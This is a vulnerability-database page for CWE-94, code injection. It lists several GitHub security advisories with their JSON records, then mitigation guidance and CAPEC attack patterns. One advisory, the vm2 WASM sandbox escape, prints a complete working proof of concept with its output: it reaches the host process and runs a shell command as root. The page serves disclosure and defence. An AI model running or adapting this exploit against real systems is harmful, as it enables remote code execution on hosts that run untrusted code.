CWE-94
Allowed-with-ReviewImproper Control of Generation of Code ('Code Injection')
Abstraction: Base · Status: Draft
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
8285 vulnerabilities reference this CWE, most recent first.
GHSA-FF6W-HVC6-X733
Vulnerability from github – Published: 2022-05-04 00:27 – Updated: 2022-05-04 00:27Microsoft .NET Framework 2.0 SP2 and 3.5.1 does not properly calculate the length of an unspecified buffer, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka ".NET Framework Heap Corruption Vulnerability."
{
"affected": [],
"aliases": [
"CVE-2012-0015"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2012-02-14T22:55:00Z",
"severity": "HIGH"
},
"details": "Microsoft .NET Framework 2.0 SP2 and 3.5.1 does not properly calculate the length of an unspecified buffer, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka \".NET Framework Heap Corruption Vulnerability.\"",
"id": "GHSA-ff6w-hvc6-x733",
"modified": "2022-05-04T00:27:42Z",
"published": "2022-05-04T00:27:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2012-0015"
},
{
"type": "WEB",
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-016"
},
{
"type": "WEB",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14513"
},
{
"type": "WEB",
"url": "http://www.us-cert.gov/cas/techalerts/TA12-045A.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-FF78-934G-MR6H
Vulnerability from github – Published: 2025-09-04 12:30 – Updated: 2025-09-04 12:30The atec Debug plugin for WordPress is vulnerable to remote code execution in all versions up to, and including, 1.2.22 via the 'custom_log' parameter. This is due to insufficient sanitization when saving the custom log path. This makes it possible for authenticated attackers, with Administrator-level access and above, to execute code on the server.
{
"affected": [],
"aliases": [
"CVE-2025-9517"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-04T10:42:35Z",
"severity": "HIGH"
},
"details": "The atec Debug plugin for WordPress is vulnerable to remote code execution in all versions up to, and including, 1.2.22 via the \u0027custom_log\u0027 parameter. This is due to insufficient sanitization when saving the custom log path. This makes it possible for authenticated attackers, with Administrator-level access and above, to execute code on the server.",
"id": "GHSA-ff78-934g-mr6h",
"modified": "2025-09-04T12:30:42Z",
"published": "2025-09-04T12:30:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9517"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=\u0026sfph_mail=\u0026reponame=\u0026new=3355260%40atec-debug%2Ftrunk\u0026old=3342365%40atec-debug%2Ftrunk"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/99fc02ea-5399-4ff2-a5f9-27878cadf40d?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FFH4-J6H5-PG66
Vulnerability from github – Published: 2026-05-05 16:44 – Updated: 2026-06-08 15:38Summary
Full sandbox escape with arbitrary code execution. Attacker code inside VM.run() obtains host process object and runs host commands with zero host cooperation.
Details
Confirmed on: vm2 3.10.4, Node.js v25.6.1 (x64 Linux)
Trigger: Attacker-controlled code passed to VM.run()
Requires: Node.js version with WebAssembly exception handling + JSTag support (tested on v25.6.1)
vm2's sandbox security relies on two JavaScript-level mechanisms: (1) a code transformer that injects handleException() into JS catch clauses to wrap host-realm errors, and (2) bridge Proxies that wrap cross-context objects. Both operate entirely within JavaScript.
WebAssembly's try_table instruction with a JSTag catch handler catches JavaScript exceptions at V8's C++ level — below JavaScript entirely. When an imported JS function throws a TypeError produced by Symbol-to-string coercion during stack formatting (e.name = Symbol(); e.stack), the WASM try_table catches it as an opaque externref and returns it as a normal function return value. This WASM exception-handling-to-return-value path is not sanitized by vm2 — the host-realm TypeError reaches attacker code unsanitized. Its constructor chain (hostError.constructor.constructor) resolves to a Function that returns the host process object, allowing for reflection outside of the vm2 context, leading to code execution.
PoC
const { VM } = require("vm2");
console.log("vm2:", require("vm2/package.json").version, "| node:", process.version);
new VM().run(`
const before = typeof process;
const err = new Error("x");
err.name = Symbol();
const wasm = new Uint8Array([
0x00,0x61,0x73,0x6d,0x01,0x00,0x00,0x00,
0x01,0x0c,0x03,0x60,0x00,0x00,0x60,0x00,0x01,0x6f,0x60,0x01,0x6f,0x00,
0x02,0x19,0x02,
0x03,0x65,0x6e,0x76,0x07,0x74,0x72,0x69,0x67,0x67,0x65,0x72,0x00,0x00,
0x02,0x6a,0x73,0x03,0x74,0x61,0x67,0x04,0x00,0x02,
0x03,0x02,0x01,0x01,
0x07,0x0f,0x01,
0x0b,0x63,0x61,0x74,0x63,0x68,0x5f,0x65,0x72,0x72,0x6f,0x72,0x00,0x01,
0x0a,0x12,0x01,0x10,0x00,
0x02,0x6f,0x1f,0x40,0x01,0x00,0x00,0x00,0x10,0x00,0x00,0x0b,0x00,0x0b,0x0b
]);
const instance = new WebAssembly.Instance(
new WebAssembly.Module(wasm),
{ env: { trigger() { err.stack; } }, js: { tag: WebAssembly.JSTag } }
);
const hostError = instance.exports.catch_error();
const p = hostError.constructor.constructor("return process")();
const id = p.mainModule.require("child_process").execSync("id").toString().trim();
const log = p.mainModule.require("console").log;
log("");
log("process before escape:", before);
log("process after escape: ", typeof p);
log("host pid: ", p.pid);
log("host node version: ", p.version);
log("RCE: ", id);
`);
> node poc.js
vm2: 3.10.4 | node: v25.6.1
process before escape: undefined
process after escape: object
host pid: 217
host node version: v25.6.1
RCE: uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
Proof files poc.js
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.10.4"
},
"package": {
"ecosystem": "npm",
"name": "vm2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.10.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-26956"
],
"database_specific": {
"cwe_ids": [
"CWE-693",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-05T16:44:16Z",
"nvd_published_at": "2026-05-04T17:16:22Z",
"severity": "CRITICAL"
},
"details": "## Summary\n\nFull sandbox escape with arbitrary code execution. Attacker code inside `VM.run()` obtains host process object and runs host commands with zero host cooperation.\n\n## Details\n\n**Confirmed on:** vm2 3.10.4, Node.js v25.6.1 (x64 Linux)\n**Trigger:** Attacker-controlled code passed to `VM.run()`\n**Requires:** Node.js version with WebAssembly exception handling + JSTag support (tested on v25.6.1)\n\nvm2\u0027s sandbox security relies on two JavaScript-level mechanisms: (1) a code transformer that injects `handleException()` into JS `catch` clauses to wrap host-realm errors, and (2) bridge Proxies that wrap cross-context objects. Both operate entirely within JavaScript.\n\nWebAssembly\u0027s `try_table` instruction with a `JSTag` catch handler catches JavaScript exceptions at V8\u0027s C++ level \u2014 below JavaScript entirely. When an imported JS function throws a TypeError produced by Symbol-to-string coercion during stack formatting (`e.name = Symbol(); e.stack`), the WASM `try_table` catches it as an opaque `externref` and returns it as a normal function return value. This WASM exception-handling-to-return-value path is not sanitized by vm2 \u2014 the host-realm TypeError reaches attacker code unsanitized. Its constructor chain (`hostError.constructor.constructor`) resolves to a Function that returns the host process object, allowing for reflection outside of the vm2 context, leading to code execution.\n\n## PoC\n\n```js\nconst { VM } = require(\"vm2\");\nconsole.log(\"vm2:\", require(\"vm2/package.json\").version, \"| node:\", process.version);\n\nnew VM().run(`\n const before = typeof process;\n\n const err = new Error(\"x\");\n err.name = Symbol();\n\n const wasm = new Uint8Array([\n 0x00,0x61,0x73,0x6d,0x01,0x00,0x00,0x00,\n 0x01,0x0c,0x03,0x60,0x00,0x00,0x60,0x00,0x01,0x6f,0x60,0x01,0x6f,0x00,\n 0x02,0x19,0x02,\n 0x03,0x65,0x6e,0x76,0x07,0x74,0x72,0x69,0x67,0x67,0x65,0x72,0x00,0x00,\n 0x02,0x6a,0x73,0x03,0x74,0x61,0x67,0x04,0x00,0x02,\n 0x03,0x02,0x01,0x01,\n 0x07,0x0f,0x01,\n 0x0b,0x63,0x61,0x74,0x63,0x68,0x5f,0x65,0x72,0x72,0x6f,0x72,0x00,0x01,\n 0x0a,0x12,0x01,0x10,0x00,\n 0x02,0x6f,0x1f,0x40,0x01,0x00,0x00,0x00,0x10,0x00,0x00,0x0b,0x00,0x0b,0x0b\n ]);\n\n const instance = new WebAssembly.Instance(\n new WebAssembly.Module(wasm),\n { env: { trigger() { err.stack; } }, js: { tag: WebAssembly.JSTag } }\n );\n\n const hostError = instance.exports.catch_error();\n const p = hostError.constructor.constructor(\"return process\")();\n const id = p.mainModule.require(\"child_process\").execSync(\"id\").toString().trim();\n const log = p.mainModule.require(\"console\").log;\n log(\"\");\n log(\"process before escape:\", before);\n log(\"process after escape: \", typeof p);\n log(\"host pid: \", p.pid);\n log(\"host node version: \", p.version);\n log(\"RCE: \", id);\n`);\n```\n\n```\n\u003e node poc.js\nvm2: 3.10.4 | node: v25.6.1\n\nprocess before escape: undefined\nprocess after escape: object\nhost pid: 217\nhost node version: v25.6.1\nRCE: uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)\n```\n\n**Proof files**\n[poc.js](https://github.com/user-attachments/files/25285089/poc.js)",
"id": "GHSA-ffh4-j6h5-pg66",
"modified": "2026-06-08T15:38:50Z",
"published": "2026-05-05T16:44:16Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-ffh4-j6h5-pg66"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26956"
},
{
"type": "PACKAGE",
"url": "https://github.com/patriksimek/vm2"
},
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/releases/tag/v3.10.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "VM2 Has a WASM Sandbox Escape"
}
GHSA-FFH5-R5XJ-CGMG
Vulnerability from github – Published: 2026-05-12 21:31 – Updated: 2026-05-13 00:48Wing FTP Server 8.1.2 contains an authenticated remote code execution vulnerability in the session serialization mechanism that allows authenticated administrators to inject arbitrary Lua code through the domain admin mydirectory field. Attackers can exploit unsafe serialization of session values into Lua source code without proper escaping of closing delimiters, causing the injected code to be executed when the poisoned session is loaded via loadfile().
{
"affected": [],
"aliases": [
"CVE-2026-44403"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-12T21:16:16Z",
"severity": "HIGH"
},
"details": "Wing FTP Server 8.1.2 contains an authenticated remote code execution vulnerability in the session serialization mechanism that allows authenticated administrators to inject arbitrary Lua code through the domain admin mydirectory field. Attackers can exploit unsafe serialization of session values into Lua source code without proper escaping of closing delimiters, causing the injected code to be executed when the poisoned session is loaded via loadfile().",
"id": "GHSA-ffh5-r5xj-cgmg",
"modified": "2026-05-13T00:48:11Z",
"published": "2026-05-12T21:31:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44403"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/wing-ftp-server-authenticated-remote-code-execution-via-session-serialization"
},
{
"type": "WEB",
"url": "https://www.wftpserver.com/serverhistory.htm"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-FFJM-VF3C-HF85
Vulnerability from github – Published: 2022-05-01 23:52 – Updated: 2022-05-01 23:52Multiple PHP remote file inclusion vulnerabilities in DesktopOnNet 3 Beta allow remote attackers to execute arbitrary PHP code via a URL in the app_path parameter to (1) don3_requiem.don3app/don3_requiem.php and (2) frontpage.don3app/frontpage.php.
{
"affected": [],
"aliases": [
"CVE-2008-2649"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2008-06-10T18:32:00Z",
"severity": "HIGH"
},
"details": "Multiple PHP remote file inclusion vulnerabilities in DesktopOnNet 3 Beta allow remote attackers to execute arbitrary PHP code via a URL in the app_path parameter to (1) don3_requiem.don3app/don3_requiem.php and (2) frontpage.don3app/frontpage.php.",
"id": "GHSA-ffjm-vf3c-hf85",
"modified": "2022-05-01T23:52:04Z",
"published": "2022-05-01T23:52:04Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2008-2649"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/42790"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/5715"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-FFMQ-G5QM-F3VF
Vulnerability from github – Published: 2022-05-17 01:12 – Updated: 2022-05-17 01:12The current_user_get_bug_filter function in core/current_user_api.php in MantisBT before 1.2.18 allows remote attackers to execute arbitrary PHP code via the filter parameter.
{
"affected": [],
"aliases": [
"CVE-2014-9280"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2014-12-08T16:59:00Z",
"severity": "HIGH"
},
"details": "The current_user_get_bug_filter function in core/current_user_api.php in MantisBT before 1.2.18 allows remote attackers to execute arbitrary PHP code via the filter parameter.",
"id": "GHSA-ffmq-g5qm-f3vf",
"modified": "2022-05-17T01:12:05Z",
"published": "2022-05-17T01:12:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9280"
},
{
"type": "WEB",
"url": "https://github.com/mantisbt/mantisbt/commit/599364b2"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/99016"
},
{
"type": "WEB",
"url": "http://seclists.org/oss-sec/2014/q4/864"
},
{
"type": "WEB",
"url": "http://seclists.org/oss-sec/2014/q4/923"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/62101"
},
{
"type": "WEB",
"url": "http://www.debian.org/security/2015/dsa-3120"
},
{
"type": "WEB",
"url": "http://www.mantisbt.org/bugs/view.php?id=17875"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/71361"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-FFR2-4FHF-CR89
Vulnerability from github – Published: 2025-08-13 18:31 – Updated: 2025-08-13 18:31NVIDIA Isaac-GR00T for all platforms contains a vulnerability in a Python component where an attacker could cause a code injection issue. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.
{
"affected": [],
"aliases": [
"CVE-2025-23296"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-13T18:15:29Z",
"severity": "HIGH"
},
"details": "NVIDIA Isaac-GR00T for all platforms contains a vulnerability in a Python component where an attacker could cause a code injection issue. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.",
"id": "GHSA-ffr2-4fhf-cr89",
"modified": "2025-08-13T18:31:25Z",
"published": "2025-08-13T18:31:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23296"
},
{
"type": "WEB",
"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5681"
},
{
"type": "WEB",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23296"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FFRW-8P66-394J
Vulnerability from github – Published: 2024-11-18 09:31 – Updated: 2025-02-11 18:31Improper Control of Generation of Code ('Code Injection'), Cross-Site Request Forgery (CSRF), : Improper Neutralization of Special Elements Used in a Template Engine vulnerability in Apache OFBiz.
This issue affects Apache OFBiz: before 18.12.17.
Users are recommended to upgrade to version 18.12.17, which fixes the issue.
{
"affected": [],
"aliases": [
"CVE-2024-48962"
],
"database_specific": {
"cwe_ids": [
"CWE-1336",
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-11-18T09:15:06Z",
"severity": "HIGH"
},
"details": "Improper Control of Generation of Code (\u0027Code Injection\u0027), Cross-Site Request Forgery (CSRF), : Improper Neutralization of Special Elements Used in a Template Engine vulnerability in Apache OFBiz.\n\nThis issue affects Apache OFBiz: before 18.12.17.\n\nUsers are recommended to upgrade to version 18.12.17, which fixes the issue.",
"id": "GHSA-ffrw-8p66-394j",
"modified": "2025-02-11T18:31:20Z",
"published": "2024-11-18T09:31:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-48962"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/OFBIZ-13162"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/6sddh4pts90cp8ktshqb4xykdp6lb6q6"
},
{
"type": "WEB",
"url": "https://ofbiz.apache.org/download.html"
},
{
"type": "WEB",
"url": "https://ofbiz.apache.org/security.html"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2024/11/16/2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:C/RE:H/U:Amber",
"type": "CVSS_V4"
}
]
}
GHSA-FFXW-F5F8-XHHF
Vulnerability from github – Published: 2022-05-17 05:44 – Updated: 2022-05-17 05:44The WBEMSingleView.ocx ActiveX control 1.50.1131.0 in Microsoft WMI Administrative Tools 1.1 and earlier allows remote attackers to execute arbitrary code via a crafted argument to the ReleaseContext method, a different vector than CVE-2010-3973, possibly an untrusted pointer dereference.
{
"affected": [],
"aliases": [
"CVE-2010-4588"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2010-12-23T18:00:00Z",
"severity": "HIGH"
},
"details": "The WBEMSingleView.ocx ActiveX control 1.50.1131.0 in Microsoft WMI Administrative Tools 1.1 and earlier allows remote attackers to execute arbitrary code via a crafted argument to the ReleaseContext method, a different vector than CVE-2010-3973, possibly an untrusted pointer dereference.",
"id": "GHSA-ffxw-f5f8-xhhf",
"modified": "2022-05-17T05:44:26Z",
"published": "2022-05-17T05:44:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2010-4588"
},
{
"type": "WEB",
"url": "http://blogs.technet.com/b/srd/archive/2011/01/07/assessing-the-risk-of-public-issues-currently-being-tracked-by-the-msrc.aspx"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/42693"
},
{
"type": "WEB",
"url": "http://twitter.com/carsteneiram/status/17526155733110784"
},
{
"type": "WEB",
"url": "http://www.kb.cert.org/vuls/id/725596"
},
{
"type": "WEB",
"url": "http://www.wooyun.org/bug.php?action=view\u0026id=1006"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-FG43-WHHQ-FF6J
Vulnerability from github – Published: 2022-05-04 00:28 – Updated: 2022-05-04 00:28Microsoft Internet Explorer 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "JScript9 Remote Code Execution Vulnerability."
{
"affected": [],
"aliases": [
"CVE-2012-0169"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2012-04-10T21:55:00Z",
"severity": "HIGH"
},
"details": "Microsoft Internet Explorer 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka \"JScript9 Remote Code Execution Vulnerability.\"",
"id": "GHSA-fg43-whhq-ff6j",
"modified": "2022-05-04T00:28:31Z",
"published": "2022-05-04T00:28:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2012-0169"
},
{
"type": "WEB",
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-023"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/74380"
},
{
"type": "WEB",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A15611"
},
{
"type": "WEB",
"url": "http://osvdb.org/81127"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/52902"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id?1026901"
},
{
"type": "WEB",
"url": "http://www.us-cert.gov/cas/techalerts/TA12-101A.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
Mitigation
Strategy: Refactoring
Refactor your program so that you do not have to dynamically generate code.
Mitigation
- Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product.
- Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.
- This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
- Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation MIT-5
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
- To reduce the likelihood of code injection, use stringent allowlists that limit which constructs are allowed. If you are dynamically constructing code that invokes a function, then verifying that the input is alphanumeric might be insufficient. An attacker might still be able to reference a dangerous function that you did not intend to allow, such as system(), exec(), or exit().
Mitigation
Use dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results.
Mitigation MIT-32
Strategy: Compilation or Build Hardening
Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).
Mitigation MIT-32
Strategy: Environment Hardening
Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).
Mitigation
For Python programs, it is frequently encouraged to use the ast.literal_eval() function instead of eval, since it is intentionally designed to avoid executing code. However, an adversary could still cause excessive memory or stack consumption via deeply nested structures [REF-1372], so the python documentation discourages use of ast.literal_eval() on untrusted data [REF-1373].
CAPEC-242: Code Injection
An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.
CAPEC-35: Leverage Executable Code in Non-Executable Files
An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.
CAPEC-77: Manipulating User-Controlled Variables
This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.